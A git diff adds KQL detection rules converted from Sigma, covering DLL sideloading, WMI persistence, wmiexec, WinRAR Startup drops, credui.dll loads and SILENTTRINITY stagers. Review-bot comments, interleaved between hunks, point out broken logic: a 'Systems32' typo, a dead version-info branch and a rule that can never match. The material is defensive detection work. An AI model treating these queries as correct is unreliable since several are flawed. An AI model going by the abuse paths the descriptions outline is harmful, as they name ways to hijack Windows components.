@@ -0,0 +1,12 @@ +// Title: Windows Terminal Profile Settings Modification By Uncommon Process +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-22 +// Level: medium +// Description: Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.015 +// False Positives: +// - Some false positives may occur with admin scripts that set WT settings. + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and FolderPath endswith "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\LocalState\\settings.json" \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/winrar_creating_files_in_startup_locations.kql b/KQL/rules/windows/file/file_event/winrar_creating_files_in_startup_locations.kql new file mode 100644 index 00000000..8a1dea3f --- /dev/null +++ b/KQL/rules/windows/file/file_event/winrar_creating_files_in_startup_locations.kql 
@@ -0,0 +1,11 @@
+// Title: WinRAR Creating Files in Startup Locations
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-07-16
+// Level: high
+// Description: Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder.
+// This kind of behaviour has been associated with exploitation of WinRAR path traversal vulnerability CVE-2025-6218 or CVE-2025-8088.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\WinRAR.exe" or InitiatingProcessFolderPath endswith "\\Rar.exe") and FolderPath contains "\\Start Menu\\Programs\\Startup\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/winsxs_executable_file_creation_by_non_system_process.kql b/KQL/rules/windows/file/file_event/winsxs_executable_file_creation_by_non_system_process.kql
new file mode 100644
index 00000000..46a52999
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/winsxs_executable_file_creation_by_non_system_process.kql
@@ -0,0 +1,10 @@
+// Title: WinSxS Executable File Creation By Non-System Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-11
+// Level: medium
+// Description: Detects the creation of binaries in the WinSxS folder by non-system processes
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceFileEvents
+| where (FolderPath endswith ".exe" and FolderPath startswith "C:\\Windows\\WinSxS\\") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\Systems32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
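Review bot: The exclusion on the last line of the WinSxS hunk compares `InitiatingProcessFolderPath` with `C:\\Windows\\Systems32\\`, which carries an extra `s` and so never matches a real path; the System32 entry of the allow-list is dead and every System32-hosted process that writes an `.exe` into WinSxS will alert. The line should use `C:\\Windows\\System32\\`. If the typo is inherited from the upstream Sigma rule it has to be corrected there as well, because the weekly workflow regenerates this file.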
diff --git a/KQL/rules/windows/file/file_event/wmi_persistence_script_event_consumer_file_write.kql b/KQL/rules/windows/file/file_event/wmi_persistence_script_event_consumer_file_write.kql
new file mode 100644
index 00000000..14818dbc
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/wmi_persistence_script_event_consumer_file_write.kql
@@ -0,0 +1,12 @@
+// Title: WMI Persistence - Script Event Consumer File Write
+// Author: Thomas Patzke
+// Date: 2018-03-07
+// Level: high
+// Description: Detects file writes of WMI script event consumer
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1546.003, attack.persistence
+// False Positives:
+// - Dell Power Manager (C:\Program Files\Dell\PowerManager\DpmPowerPlanSetup.exe)
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/wmiexec_default_output_file.kql b/KQL/rules/windows/file/file_event/wmiexec_default_output_file.kql
new file mode 100644
index 00000000..f6b6e93b
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/wmiexec_default_output_file.kql
@@ -0,0 +1,12 @@
+// Title: Wmiexec Default Output File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-02
+// Level: critical
+// Description: Detects the creation of the default output filename used by the wmiexec tool
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.execution, attack.t1047
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath matches regex "\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$" or FolderPath matches regex "C:\\\\__1\\d{9}\\.\\d{1,7}$" or FolderPath matches regex "D:\\\\__1\\d{9}\\.\\d{1,7}$"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/wmiprvse_wbemcomn_dll_hijack_file.kql b/KQL/rules/windows/file/file_event/wmiprvse_wbemcomn_dll_hijack_file.kql
new file mode 100644
index 00000000..33a1e19f
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/wmiprvse_wbemcomn_dll_hijack_file.kql
@@ -0,0 +1,10 @@
+// Title: Wmiprvse Wbemcomn DLL Hijack - File
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-12
+// Level: critical
+// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.002
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\wbem\\wbemcomn.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/writing_local_admin_share.kql b/KQL/rules/windows/file/file_event/writing_local_admin_share.kql
new file mode 100644
index 00000000..4489d5f9
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/writing_local_admin_share.kql
@@ -0,0 +1,11 @@
+// Title: Writing Local Admin Share
+// Author: frack113
+// Date: 2022-01-01
+// Level: medium
+// Description: Aversaries may use to interact with a remote network share using Server Message Block (SMB).
+// This technique is used by post-exploitation frameworks.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.lateral-movement, attack.t1546.002
+
+DeviceFileEvents
+| where FolderPath contains "\\\\127.0.0" and FolderPath contains "\\ADMIN$\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/wscript_or_cscript_dropper_file.kql b/KQL/rules/windows/file/file_event/wscript_or_cscript_dropper_file.kql
new file mode 100644
index 00000000..f10c0b30
--- /dev/null
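Review bot: `InitiatingProcessFolderPath =~ "System"` on the last line of the wbemcomn hunk assumes Defender fills the folder-path column with the bare word `System` for the kernel process, whereas for every other rule in this commit that column holds a full path; this should be checked against real `DeviceFileEvents` rows for PID 4, and `InitiatingProcessFileName =~ "System"` may be the more reliable field to match. The upstream Sigma rule matches on an image name, so the converter may need a special case for the pseudo-process rather than a literal path comparison.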
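Review bot: The description of the writing_local_admin_share hunk reads `Aversaries may use to interact with a remote network share`, which is both misspelled and ungrammatical; it should read `Adversaries may interact with a remote network share using Server Message Block (SMB).`. Since this file is regenerated by the workflow, the wording needs to be fixed in the Sigma source rather than here.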
+++ b/KQL/rules/windows/file/file_event/wscript_or_cscript_dropper_file.kql
@@ -0,0 +1,10 @@
+// Title: WScript or CScript Dropper - File
+// Author: Tim Shelton
+// Date: 2022-01-10
+// Level: high
+// Description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") and (FolderPath endswith ".jse" or FolderPath endswith ".vbe" or FolderPath endswith ".js" or FolderPath endswith ".vba" or FolderPath endswith ".vbs") and (FolderPath startswith "C:\\Users\\" or FolderPath startswith "C:\\ProgramData")
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/abusable_dll_potential_sideloading_from_suspicious_location.kql b/KQL/rules/windows/image_load/abusable_dll_potential_sideloading_from_suspicious_location.kql
new file mode 100644
index 00000000..a98f0e08
--- /dev/null
+++ b/KQL/rules/windows/image_load/abusable_dll_potential_sideloading_from_suspicious_location.kql
@@ -0,0 +1,10 @@ +// Title: Abusable DLL Potential Sideloading From Suspicious Location +// Author: X__Junior (Nextron Systems) +// Date: 2023-07-11 +// Level: high +// Description: Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceImageLoadEvents +| where (FolderPath endswith "\\coreclr.dll" or FolderPath endswith "\\facesdk.dll" or FolderPath endswith "\\HPCustPartUI.dll" or FolderPath endswith "\\libcef.dll" or FolderPath endswith "\\ZIPDLL.dll") and ((FolderPath contains ":\\Perflogs\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\Temporary Internet" or FolderPath contains "\\Windows\\Temp\\") or ((FolderPath contains ":\\Users\\" and FolderPath contains "\\Favorites\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Favourites\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Contacts\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Pictures\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/image_load/amsi_dll_loaded_via_lolbin_process.kql b/KQL/rules/windows/image_load/amsi_dll_loaded_via_lolbin_process.kql new file mode 100644 index 00000000..6a46db3a --- /dev/null +++ b/KQL/rules/windows/image_load/amsi_dll_loaded_via_lolbin_process.kql 
@@ -0,0 +1,10 @@
+// Title: Amsi.DLL Loaded Via LOLBIN Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-01
+// Level: medium
+// Description: Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\amsi.dll" and (InitiatingProcessFolderPath endswith "\\ExtExport.exe" or InitiatingProcessFolderPath endswith "\\odbcconf.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/aruba_network_service_potential_dll_sideloading.kql b/KQL/rules/windows/image_load/aruba_network_service_potential_dll_sideloading.kql
new file mode 100644
index 00000000..b905f641
--- /dev/null
+++ b/KQL/rules/windows/image_load/aruba_network_service_potential_dll_sideloading.kql
@@ -0,0 +1,10 @@ +// Title: Aruba Network Service Potential DLL Sideloading +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-22 +// Level: high +// Description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1574.001 + +DeviceImageLoadEvents +| where ((FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\msvcr100.dll" or FolderPath endswith "\\msvcp100.dll" or FolderPath endswith "\\dbghelp.dll" or FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\dpapi.dll") and InitiatingProcessFolderPath endswith "\\arubanetsvc.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/image_load/baaupdate_exe_suspicious_dll_load.kql b/KQL/rules/windows/image_load/baaupdate_exe_suspicious_dll_load.kql new file mode 100644 index 00000000..33fcffde --- /dev/null +++ b/KQL/rules/windows/image_load/baaupdate_exe_suspicious_dll_load.kql 
@@ -0,0 +1,12 @@ +// Title: BaaUpdate.exe Suspicious DLL Load +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-18 +// Level: high +// Description: Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable which could indicate an attempt to lateral movement via BitLocker DCOM & COM Hijacking. +// This technique abuses COM Classes configured as INTERACTIVE USER to spawn processes in the context of the logged-on user's session. Specifically, it targets the BDEUILauncher Class (CLSID ab93b6f1-be76-4185-a488-a9001b105b94) +// which can launch BaaUpdate.exe, which is vulnerable to COM Hijacking when started with input parameters. This allows attackers to execute code in the user's context without needing to steal credentials or use additional techniques to compromise the account. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1021.003 + +DeviceImageLoadEvents +| where (FolderPath contains ":\\Perflogs\\" or FolderPath contains ":\\Users\\Default\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Roaming\\" or FolderPath contains "\\Contacts\\" or FolderPath contains "\\Favorites\\" or FolderPath contains "\\Favourites\\" or FolderPath contains "\\Links\\" or FolderPath contains "\\Music\\" or FolderPath contains "\\Pictures\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Temporary Internet" or FolderPath contains "\\Videos\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\BaaUpdate.exe" \ No newline at end of file 
diff --git a/KQL/rules/windows/image_load/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql b/KQL/rules/windows/image_load/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql new file mode 100644 index 00000000..8f3be24d --- /dev/null +++ b/KQL/rules/windows/image_load/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql @@ -0,0 +1,10 @@ +// Title: Clfs.SYS Loaded By Process Located In a Potential Suspicious Location +// Author: X__Junior +// Date: 2025-01-20 +// Level: medium +// Description: Detects Clfs.sys being loaded by a process running from a potentially suspicious location. Clfs.sys is loaded as part of many CVEs exploits that targets Common Log File. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceImageLoadEvents +| where FolderPath endswith "\\clfs.sys" and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Temporary Internet" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Pictures\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/image_load/clr_dll_loaded_via_office_applications.kql b/KQL/rules/windows/image_load/clr_dll_loaded_via_office_applications.kql new file mode 100644 index 00000000..8168f9fc --- /dev/null +++ b/KQL/rules/windows/image_load/clr_dll_loaded_via_office_applications.kql 
@@ -0,0 +1,10 @@ +// Title: CLR DLL Loaded Via Office Applications +// Author: Antonlovesdnb +// Date: 2020-02-19 +// Level: medium +// Description: Detects CLR DLL being loaded by an Office Product +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 + +DeviceImageLoadEvents +| where FolderPath contains "\\clr.dll" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/KQL/rules/windows/image_load/credui_dll_loaded_by_uncommon_process.kql b/KQL/rules/windows/image_load/credui_dll_loaded_by_uncommon_process.kql new file mode 100644 index 00000000..8eb0fba6 --- /dev/null +++ b/KQL/rules/windows/image_load/credui_dll_loaded_by_uncommon_process.kql 
@@ -0,0 +1,12 @@ +// Title: CredUI.DLL Loaded By Uncommon Process +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-10-20 +// Level: medium +// Description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW". +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.collection, attack.t1056.002 +// False Positives: +// - Other legitimate processes loading those DLLs in your environment. + +DeviceImageLoadEvents +| where ((FolderPath endswith "\\credui.dll" or FolderPath endswith "\\wincredui.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe", "C:\\Windows\\regedit.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SystemApps\\")))) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith "C:\\Users\\") or InitiatingProcessFolderPath endswith "\\opera_autoupdate.exe" or (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Teams\\" and InitiatingProcessFolderPath endswith "\\Teams.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\")))) \ No newline at end of file 
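Review bot: The alternative `InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll")` on the `| where` line inspects the version info of the loading process, whereas the Sigma source's `OriginalFileName` on an image-load event describes the loaded image; a process whose OriginalFileName is a DLL name will not occur, so that branch is dead and only the two `FolderPath endswith` terms carry the detection. That is harmless here (it can neither widen nor narrow the match), but it must not be read as covering renamed copies of the DLL. As far as I know DeviceImageLoadEvents exposes no version info for the loaded image, so the honest conversion drops the clause and records the gap, e.g. `// NOTE: renamed copies of credui.dll are not covered - MDE exposes no OriginalFileName for the loaded image`. The converter appears to map `OriginalFileName` identically for image_load and process_creation rules; that mapping should differ by log source.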
diff --git a/KQL/rules/windows/image_load/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql b/KQL/rules/windows/image_load/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql
new file mode 100644
index 00000000..3a11d65f
--- /dev/null
+++ b/KQL/rules/windows/image_load/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql
@@ -0,0 +1,10 @@
+// Title: Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE
+// Author: Greg (rule)
+// Date: 2022-06-17
+// Level: high
+// Description: Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202, cve.2022-30190
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\sdiageng.dll" and InitiatingProcessFolderPath endswith "\\msdt.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/dll_load_by_system_process_from_suspicious_locations.kql b/KQL/rules/windows/image_load/dll_load_by_system_process_from_suspicious_locations.kql
new file mode 100644
index 00000000..a5fdf8f1
--- /dev/null
+++ b/KQL/rules/windows/image_load/dll_load_by_system_process_from_suspicious_locations.kql
@@ -0,0 +1,10 @@
+// Title: DLL Load By System Process From Suspicious Locations
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-17
+// Level: medium
+// Description: Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+
+DeviceImageLoadEvents
+| where (FolderPath startswith "C:\\Users\\Public\\" or FolderPath startswith "C:\\PerfLogs\\") and InitiatingProcessFolderPath startswith "C:\\Windows\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/dll_loaded_from_suspicious_location_via_cmspt_exe.kql b/KQL/rules/windows/image_load/dll_loaded_from_suspicious_location_via_cmspt_exe.kql new file mode 100644 index 00000000..0c9a11c2 --- /dev/null +++ b/KQL/rules/windows/image_load/dll_loaded_from_suspicious_location_via_cmspt_exe.kql @@ -0,0 +1,12 @@ +// Title: DLL Loaded From Suspicious Location Via Cmspt.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-30 +// Level: high +// Description: Detects cmstp loading "dll" or "ocx" files from suspicious locations +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.003 +// False Positives: +// - Unikely + +DeviceImageLoadEvents +| where (FolderPath contains "\\PerfLogs\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Users\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\") and (FolderPath endswith ".dll" or FolderPath endswith ".ocx") and InitiatingProcessFolderPath endswith "\\cmstp.exe" \ No newline at end of file diff --git a/KQL/rules/windows/image_load/dll_sideloading_of_shellchromeapi_dll.kql b/KQL/rules/windows/image_load/dll_sideloading_of_shellchromeapi_dll.kql new file mode 100644 index 00000000..347799d8 --- /dev/null +++ b/KQL/rules/windows/image_load/dll_sideloading_of_shellchromeapi_dll.kql 
@@ -0,0 +1,11 @@
+// Title: DLL Sideloading Of ShellChromeAPI.DLL
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-01
+// Level: high
+// Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL.
+// Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\ShellChromeAPI.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/dotnet_assembly_dll_loaded_via_office_application.kql b/KQL/rules/windows/image_load/dotnet_assembly_dll_loaded_via_office_application.kql
new file mode 100644
index 00000000..91e634ef
--- /dev/null
+++ b/KQL/rules/windows/image_load/dotnet_assembly_dll_loaded_via_office_application.kql
@@ -0,0 +1,10 @@
+// Title: DotNET Assembly DLL Loaded Via Office Application
+// Author: Antonlovesdnb
+// Date: 2020-02-19
+// Level: medium
+// Description: Detects any assembly DLL being loaded by an Office Product
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+
+DeviceImageLoadEvents
+| where FolderPath startswith "C:\\Windows\\assembly\\" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/dotnet_clr_dll_loaded_by_scripting_applications.kql b/KQL/rules/windows/image_load/dotnet_clr_dll_loaded_by_scripting_applications.kql new file mode 100644 index 00000000..c35cf26f --- /dev/null +++ b/KQL/rules/windows/image_load/dotnet_clr_dll_loaded_by_scripting_applications.kql @@ -0,0 +1,10 @@ +// Title: DotNet CLR DLL Loaded By Scripting Applications +// Author: omkar72, oscd.community +// Date: 2020-10-14 +// Level: high +// Description: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.privilege-escalation, attack.t1055 + +DeviceImageLoadEvents +| where (FolderPath endswith "\\clr.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\mscorlib.dll") and (InitiatingProcessFolderPath endswith "\\cmstp.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\msxsl.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") \ No newline at end of file diff --git a/KQL/rules/windows/image_load/fax_service_dll_search_order_hijack.kql b/KQL/rules/windows/image_load/fax_service_dll_search_order_hijack.kql new file mode 100644 index 00000000..0a56d66a --- /dev/null +++ b/KQL/rules/windows/image_load/fax_service_dll_search_order_hijack.kql 
@@ -0,0 +1,12 @@ +// Title: Fax Service DLL Search Order Hijack +// Author: NVISO +// Date: 2020-05-04 +// Level: high +// Description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where (FolderPath endswith "ualapi.dll" and InitiatingProcessFolderPath endswith "\\fxssvc.exe") and (not(FolderPath startswith "C:\\Windows\\WinSxS\\")) \ No newline at end of file diff --git a/KQL/rules/windows/image_load/gac_dll_loaded_via_office_applications.kql b/KQL/rules/windows/image_load/gac_dll_loaded_via_office_applications.kql new file mode 100644 index 00000000..8dd7b57c --- /dev/null +++ b/KQL/rules/windows/image_load/gac_dll_loaded_via_office_applications.kql @@ -0,0 +1,12 @@ +// Title: GAC DLL Loaded Via Office Applications +// Author: Antonlovesdnb +// Date: 2020-02-19 +// Level: high +// Description: Detects any GAC DLL being loaded by an Office Product +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 +// False Positives: +// - Legitimate macro usage. Add the appropriate filter according to your environment + +DeviceImageLoadEvents +| where FolderPath startswith "C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file 
diff --git a/KQL/rules/windows/image_load/hacktool_silenttrinity_stager_dll_load.kql b/KQL/rules/windows/image_load/hacktool_silenttrinity_stager_dll_load.kql
new file mode 100644
index 00000000..1db7a2b1
--- /dev/null
+++ b/KQL/rules/windows/image_load/hacktool_silenttrinity_stager_dll_load.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - SILENTTRINITY Stager DLL Load
+// Author: Aleksey Potapov, oscd.community
+// Date: 2019-10-22
+// Level: high
+// Description: Detects SILENTTRINITY stager dll loading activity
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where InitiatingProcessVersionInfoFileDescription contains "st2stager"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_a_suspicious_process.kql b/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_a_suspicious_process.kql
new file mode 100644
index 00000000..55ec5c4e
--- /dev/null
+++ b/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_a_suspicious_process.kql
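Review bot: The converted query `| where InitiatingProcessVersionInfoFileDescription contains "st2stager"` matches on the FileDescription of the process performing the load, but the Sigma source's `Description|contains: 'st2stager'` on an image-load event refers to the version info of the loaded DLL; a host process is never going to carry the stager's description, so at level high this is a silent false negative that looks like a working rule. To my knowledge DeviceImageLoadEvents exposes version-info columns only for the initiating process, so the rule cannot be faithfully expressed on that table and the better outcome is a logged conversion failure rather than a generated file. If a placeholder must be kept, state the fidelity loss in the header, e.g. `// CONVERSION NOTE: source matched the loaded image's Description; MDE exposes no image version info, so this query is not equivalent`.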
